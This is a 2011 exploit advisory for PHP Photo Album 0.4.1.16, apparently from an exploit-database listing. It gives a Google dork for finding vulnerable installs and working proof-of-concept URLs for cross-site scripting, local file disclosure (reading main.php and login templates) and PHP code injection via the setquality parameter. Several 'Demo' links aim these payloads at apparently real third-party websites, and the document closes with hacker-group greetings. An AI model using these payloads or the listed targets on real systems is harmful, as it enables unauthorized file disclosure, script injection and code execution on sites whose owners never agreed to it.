---------------------------------------------------------------- PHP Photo Album <= (0.4.1.16) Multiple Disclosure Vulnerabilities ---------------------------------------------------------------- # Exploit Title: PHP Photo Album <= (0.4.1.16) Multiple Disclosure Vulnerabilities # Google Dork: inurl:main.php?cmd=imageview&var1= # Application Name: [PHP Photo Album] # Date: 2011-10-29 # Author: BHG Security Center # Home: Http://black-hg.org # Software Link: [ http://www.phpalbum.net/dw ] # Version: [ 0.4.1.16 ] # Impact : [ High ] # Tested on: [linux+apache] # CVE : Webapps # Finder(s): - Net.Edit0r (Net.edit0r [at] att [dot] net) - tHe.k!ll3r (Attack-bhg [at] att [dot] net) - 2MzRp (mzrp2 [at] Yahoo [dot] com ) # Description: : Given the vulnerability you want to read files on the server must have access +-----------------------+ | Cross Site scripting | +-----------------------+ The vulnerable code is located in /www/main.php?cmd=imageview&var1=[XSS] Proof of Concept: ----------------- ~ PoC : http://localhost/phpAlbum/main.php?cmd=imageview&var1=[XSS] ~ Demo : http://www.phpalbum.net/demo3/main.php?cmd=imageview&var1= ~ Poc 2 http://localhost/phpAlbum/main.php?cmd=albumnew&keyword=[XSS] ~ Demo :http://www.iloveazucar.com/phpAlbum/main.php?cmd=albumnew&keyword="onmouseover%3dprompt(975554) bad%3d" ~ Demo :http://www.dolfpretorius.com/main.php?cmd=albumnew&keyword="onmouseover=prompt(975554) bad=" +----------------------+ | Download/Source Code | +----------------------+ The vulnerable code is located in /www/main.php Proof of Concept: ----------------- ~ PoC : http://localhost/phpAlbum/main.php?cmd=image&var1=[LFD] ~ PoC : http://localhost/phpAlbum/main.php?cmd=image&var1=../main.php ~ Demo : http://www.mihoby.org/phpAlbum/main.php?cmd=image&var1=../main.php ~ PoC 2 : http://localhost/main.php?cmd=themeimage&var1=[LFD] ~ Demo :http://www.dolfpretorius.com/main.php?cmd=themeimage&var1=comments.tpl.php ~ Demo :http://www.biochem.dal.ca/outreach/phpAlbum/main.php?cmd=themeimage&var1=login.tpl.php # Important Notes: Php files from source to display (Veiw Page Source) your browser +--------------------+ | PHP Code Injection | +--------------------+ The vulnerable code is located in /www/main.php 124 : Array 125 : ( 126 : [0] => cmd=phpinfo 127 : ) Proof of Concept: ----------------- ~ PoC : http://localhost/phpAlbum/main.php?cmd=phpinfo ~ PoC : http://localhost/demo3/main.php?keyword=hack&cmd=phpinfo ~ Demo : http://www.dolfpretorius.com/main.php?cmd=phpinfo ~ PoC 2 http://localhost/main.php?cmd=setquality&var1=[PHP Code Injection] ~ Demo : http://www.manufacturinget.com/album/main.php?cmd=setquality&var1=${@print(bhg)}\ [-] Disclosure timeline: [12/10/2011] - Vulnerabilities discovered [14/10/2011] - Others vulnerabilities discovered [15/10/2011] - Issues reported to http://black-hg.org [29/10/2011] - Public disclosure # Greets To : Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ 2MzRp ~ ArYaIeIrAn ~ Mikili cmaxx ~ G3n3Rall ~ Mr.XHat ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter ~ NoL1m1t s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ ./Persian Gulf ===========================================[End]=============================================